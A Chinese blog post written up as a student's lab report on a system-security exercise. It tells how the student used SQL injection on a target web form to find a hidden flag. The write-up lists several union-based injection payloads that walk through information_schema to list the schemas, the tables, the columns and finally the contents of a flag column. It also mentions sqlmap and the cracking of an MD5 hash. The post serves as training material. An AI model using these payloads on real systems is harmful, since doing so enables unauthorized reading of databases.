系统安全实验——Web表单SQL注入

已于 2023-04-12 22:04:01 修改
阅读量636 收藏 3
点赞数 3
文章标签: sql 数据库
于 2023-04-12 22:01:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/it_girl_xyx/article/details/130113005
版权

题目要求

打开浏览器,进入靶机ip对应的网页,对其后台的数据库进行注入攻击,得到flag

摸索过程

sqlmap

一开始搜索的都是“SQL注入”,答案一般都需要工具sqlmap。

下载安装后,根据一些基本SQL注入语句,查看了qwerty中的user表,里面有user_id,user_name和password。

根据以往的实验来讲,一般flag就是password嘛,拿到这一串东西:

bcbe3365e6ac95ea2c0343a2395834dd 

我还用md5解密得到222.

但是,答案错误!

到底是哪里出问题了呢?一个多小时的摸索在这里停滞,不知如何是好。

Web表单注入

在助教老师和同学的提点下,换一个关键词搜索。搜到了这篇文章,感觉非常对口。

web 漏洞入门之 —— SQL 注入教程_实验楼v的博客-CSDN博客

从数据库-table-column一步步走下去,诶?怎么还是这个md5串?!

1'+union+select+password+from+user 

崩溃!跟蓝朋友出去吃了个《食古论今》啃完猪蹄后回来继续做。

重整思路

也许flag根本就不是user的password。又想起来qwerty数据库里除了user还有一个奇怪的名字table23335,当时因为注意力全被user吸引,就没注意它。

实验步骤

进入靶机网页后,再输入栏中输入:

1.查所有数据库

-1' union select schema_name from information_schema.SCHEMATA#

那两个带schema的应该是sql自带的配置不用管,我也进mysql看了一下,没有什么有价值的东西,所以正确答案一定还在qwerty里!

2.查qwerty数据库所有表

-1' union select table_name from information_schema.tables where table_schema="qwerty"#

 3.查table23335的所有列

-1' union select column_name from information_schema.columns where table_name="table23335"#

这时候我恍然大悟。这个pwd88s与题目的提示“pwdxxx”很像呀!就是它! 

4.看pwd88s的内容

 -1' union select pwd88s from qwerty.table23335#

 啊!这小串数字太亲切啦!它就是flag!

总结与反思

所以其实sqlmap的方法也是可用的,甚至打的字可能还少一些。只要选对了表!!!

以后不要想当然,要广撒网。

做不出来就去啃个猪蹄儿!

IT_GIRL_XAH
关注
研发安全(二)——后端开发必须掌握的SQL注入漏洞与防护
初学者乐园的博客
03-24 135
SQL 注入对于我们研发人员来说,应该基本都听说过,甚至还在开发功能过程中不知不觉引入了SQL注入漏洞,只是没被发现而已。所以,本文会系统的介绍下SQL注入漏洞的危害以及我们开发过程中如何进行防护。
MyBatis中SQL注入攻击和防护——掌握技巧保护应用安全
最新发布
AI天才研究院
07-28 1242
随着互联网信息化、云计算等技术的发展,网站业务越来越多样化、个性化,对用户输入数据的安全性要求也越来越高。在WEB开发中,常用的一种方式是用SQL作为后台语言,通过ORM工具将数据存储到数据库中并进行相关查询。由于ORM框架本身的特点,容易受到SQL注入攻击。SQL注入(英语:SQL injection)指的是通过向服务器端发送非法的SQL命令,而不是使用有效的查询条件而访问数据库,最终获取不正确的数据。
Web入门 SQL注入 表单含义
Bald__girl的博客
11-26 440
一、表单: 主要负责数据采集,由表单标签、表单域、表单按钮三部分组成。 1、表单标签 功能:用于申明表单,定义采集数据的范围,也就是和里面包含的数据将被提交到服务器或者电子邮件里。 语法:<FORM ACTION="UPL"METHOD=“GET|POST"ENCTYPE=“MIME"TARGET=”…”>… 2、表单表单域包含了文本框、多行文本框、密码框、隐藏域、复选框、单选框和...
web测试-sql注入漏洞
zzywan
10-04 1044
是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。
基于表单sql注入
weixin_44574152的博客
07-06 943
前言:题目来源sqli-labs-master第10/11题
表单注入——sqli-labs第11~16关
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-28 1783
1、观察是post还是get 可以看url的变化,或者看源码 xxxx’ order by 10# ’ order by 2#
html 表单注入,csrf表单注入
weixin_34138673的博客
06-25 428
将生成的唯一token传入后台隐藏表单,并保存在session中,接受的时候判断与之前的是否相同session_start();if (_POST['token'] == name = strip_tags(name = substr(name = cleanHex($name);}else{//stop all processing! remote form posting attempt!}}...
信安实验三—— XSS 和 SQL 注入
Visual_LXY的博客
12-03 975
文章目录一,基本概念(一)XSS/CSS1.什么是XSS2.什么是XSS攻击3.什么是Cookie4.XSS漏洞分类5.XSS防御(二)SQL注入攻击1.什么是SQL注入攻击2.为何会有SQL注入攻击3.何时使用SQL注入攻击4.MySQL简介二,XSS/CSS三,SQL注入攻击四,实验小结 一,基本概念 (一)XSS/CSS 1.什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代
千里之堤,溃于蚁穴——揭密SQL注入攻击——初识SQL注入
06-26
### 千里之堤,溃于蚁穴——揭密SQL注入攻击 #### 一、SQL注入漏洞与攻击 SQL注入SQL Injection)是一种常见的安全漏洞,它发生在应用程序没有正确处理用户输入的情况下,允许攻击者通过恶意构造的SQL语句来操控...
安全测试——SQL注入
成都汇智动力的博客
07-31 793
SQL注入Web系统安全攻击的常见手段,攻击者通过构建特殊的输入或非法的SQL命令插入表单或页面请求的字符串中后提交,从而达到利用服务器执行恶意SQL语句的目的。SQL注入攻击成功后,可直接屏蔽服务器验证,获取访问权限,甚至获取服务器的最高权限,执行篡改记录等恶意行为。 容易被实施SQL注入的主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL注入根据注入技术原理的不同,一般分为数据库平台注入和程序代码注入数据库平台SQL注入Web系统使用的数据库平台配置不...
post表单防止注入
01-22
post表单,这个不知道大家会不会,传上来分享一下,呵呵
jquery 动态表单数据注入(己修改)
dxking100的博客
06-20 297
1.标准的html。 2.用户可以html自写义枚举和连接数据库为select、checkbox、radio等标签进行注入。 3.服务端返数据(json格式)html自动填充。 4.数据交互时以ajax方式传递。 Insert title here jsonToSelectHtml = function(id, data) {//json转为select的h...
web安全sql注入
天道酬勤
05-06 996
sql的定义: sql是操作数据结构化查询的语言,网页的应用数据和后台数据库交互需要使用sql语句,sql注入是将WEB前端界面原URL参数、表单参数,修改拼接成sql语句传递到服务器端、进而传递给数据库服务器执行sql命令、如果web服务对输入的程序没有进行有效校验,输入特定的sql语句欺骗服务器达到任意查询的目的、最终使web服务器执行恶意命令。 、基于布尔的盲注 因为web的页面返回值都是True或者False,所以布尔盲注就是注入后根据页面返回值来得到数据库信息的一种办法。 2、基于时间的盲
form表单mysql防#号注入
weixin_34401479的博客
10-12 417
form表单mysql防#号注入 #在mysql中只用来注释作用,但是它却很受***欢迎 演示两种简单input输入#号的mysql***: 数据库管理员账号user表 第一种(账号***,密码随便填): 第二种(账号随便填,密码***): 总结:特别注意写表单,一定要自己过滤掉#号。注意框架默认是没有过滤掉#号的。比如本文用到的TP3.2.2 The end 转载于:https://blog.5...
由一次登录表单注入引起的复习
eldn__的专栏
04-21 1733
很久没有玩这些东西了,感觉都有点健忘了,呵呵~~ 注入:很明显都是冲着数据库去的,凡是有注入漏洞的网站大都是由用户(浏览器)传参并带入数据库查询时检查不严格造成的。 注入,从提交数据到Web服务器的方式上来讲分为2种:Get 和 Post 。        其中Get的表现形式有:在诸如:http://www.xxx.com/news_lists.asp?id=X-X-X,根据其传入
SQL注入基础四---PHP表单验证
qq_41759633的博客
08-04 242
什么是表单 表单在网页中注意负责数据采集功能。 一个表单有三个基本组成部分 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法. <fomr action="URL" method="GET/POST" enctype="multipart/form-data">` 属性 值 描述 action URL 表单提交的目的地 met...
php前台登录 sql注入_[实战项目]PHP实现登录注册之表单注册功能
weixin_29599245的博客
03-09 232
前言从今天开始,我们要真正编写一点PHP代码了,或许你有些知识掌握的还不够牢固,但是没关系,跟着代码走,多写,多查,只要你对编程感兴趣,你就一定会慢慢成为一个PHPer。image.png提出问题在本章学习之后,你使用了我的代码,又参考了网上一些代码或者教科书上一些代码,发现,咦,为什么书上是mysql而且一直出错?而我用的却是mysqli ?二者有什么区别吗?大有区别,简单来说,mysql_系列...
获取表单防止注入 子程序
aaa117659928的专栏
09-17 355
&lt;body&gt; &lt;% czkh = Saferequest("czkh",0) czme = Saferequest("czme",0) if czkh = "" or czme = "" then response.write "&lt;script&gt;alert('请填写内容');&lt;/script&gt;" respons
简单SQL注入实验web,靶场搭建在phpstudy,连接mysql数据库;里面有很多靶场,今天就只是玩一玩sql
xiaochenhang的博客
08-17 361
columns表:table_schema:存储了所有的数据库名字,table_name:存储了所有的表 column_name 存储了所有的字段名字;7、通过为真语句判断后正常,为假语句异常,可能存在整型注入,直接使用数字型(整型)注入看一看;tables表:table_schema:存储了所有数据库名字,table_name:存储了所有的表名字。8、判断好字段数为6后,利用union判断回显字段,若无回显,接下来则不能在浏览器显示查询;4、搭建好后,有一个警告,不用管它。......
深入理解Web安全:SQL注入攻击进阶教程
本课程主要探讨了Web安全中的一个重要话题——SQL注入的高级技巧。SQL注入是一种常见的网络安全漏洞,它允许攻击者通过构造恶意的SQL语句来操纵或获取数据库中的敏感信息。在本课程中,学习者将深入理解这一威胁,并...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值